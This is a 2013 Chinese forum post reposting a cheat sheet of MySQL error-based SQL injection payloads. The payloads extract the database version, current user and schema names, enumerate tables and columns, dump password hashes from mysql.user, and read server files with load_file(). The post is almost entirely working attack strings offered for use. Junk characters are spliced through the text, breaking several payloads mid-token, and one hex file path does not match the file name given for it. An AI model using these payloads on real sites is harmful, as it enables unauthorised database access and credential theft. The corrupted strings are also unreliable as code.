本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
5 o' E5 _) W7 o3 Q/ T2 o+ O; }; B/ F) C+ K
3 \" a2 W( P- z- Z& ^3 c) l
Mysql暴错注入参考(pdf),每天一贴。。。
0 d2 L& ?3 \8 @- S8 k0 Q# ^" w: Y' _( y
! W, W- d! W) T5 R* h9 XMySql Error Based Injection Reference/ ]& M& h' M$ F6 d9 R2 [
[Mysql暴错注入参考]
1 }' u+ |+ Z( a$ O0 RAuthornig0s1992
) L$ J+ G! P& Q* }Blog:http://pnig0s1992.blog.51cto.com/
8 ^3 \: v/ q' \, b/ q; q& m/ \+ nTeAm:http://www.FreeBuf.com/
u) u, Q8 h1 R* i$ J* A" B( |Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
& F5 M: C. j J" N l小部分版本使用name_const()时会报错.可以用给出的Method.2测试0 Y9 ]. y' _/ o3 d9 Z% D
查询版本:. O- f0 [8 U" ]
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
) Q8 ^* d6 y. m9 wjoin+(select+name_const(@@version,0))b)c)2 k6 X+ d& z$ z/ U2 U
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
@4 _( q5 E1 B; @up by a)b)
8 z: \, T! n( t- \$ @' F3 m7 N# }查询当前用户:; i% M1 }) z; U3 ?! e! p; p# v/ P7 X; P0 l
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)8 ~/ B2 c, J. \6 h
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
+ w( U. o6 J& G5 A a8 b" Mand(0)*2))x+from+information_schema.tables+group+by+x)a)
0 M/ |* c$ K2 R- w查询当前数据库:4 Q$ P5 c. c6 W; ] s
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
; ^, R% i+ g$ U* S7 U2 dMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
8 d/ I: M4 i& For(rand(0)*2))x+from+information_schema.tables+group+by+x)a)* `. B+ | {% C# ?
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+2 L& h4 U- @# o2 I# Z; W
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
5 ]" R: l& ~% |# I% T' t# R顺序替换! d+ N0 m9 T5 R7 m
爆指定库数目:
0 _7 `( O1 Q4 M" T, ~0 land+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
( O& A- S `: \! t6 Cable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group/ R1 r3 U: }' P8 A
+by+x)a)+and+1=1 0x6D7973716C=mysql
$ l- e& g6 R7 M$ t& _依次爆表:
( S6 C& J- f( s7 ^* n3 Uand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t8 K/ u# d; w# r1 h' }1 _) q
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta _ w# S/ ?3 T, D; |, g/ {9 ~+ L
bles+group+by+x)a)+and+1=1
/ _# G# x& U# c6 l0x6D7973716C=Mysql 将n顺序替换
* d3 _3 P* S: n+ l. q4 s' n爆表内字段数目:7 \* t8 _, H! }" Q7 x/ H) Q
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
5 s2 g5 b* \, W. S$ l+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
; P" ^. ^0 Z" Z, \# s0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
, s6 x/ o, o% P" s* N依次爆字段:
$ J$ H. K1 [* i4 @/ S* j: zand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where7 g% }3 _' ~# K0 z' q
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1* ^& B& V; i8 G [( P9 R3 b3 V
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 将n顺序替换
$ }$ ^: Q( W5 C! a& K: B$ O依次暴内容:$ {' G! ]$ d! n6 h: \
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
+ O# n/ v2 i& t6 @3 o' Zma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
; j5 @* n2 w- t7 e3 f- M* Z; e将n顺序替换
" R; t0 J! u* F! f/ _2 F爆文件内容:
2 S2 }0 O& g! @# n2 jand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
. g3 N9 V) G7 \2 D* C* Ffrom+information_schema.tables+group+by+a)b)
2 |0 h0 Z; H9 O) v3 M" s9 A l0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节$ {7 o( u% i: ?
Thx for reading.
6 O) `7 f/ @# B: \! w: b$ j) m* e$ P6 k" G
不要下载也可以,
# t# D1 f4 P/ A6 x# V, a |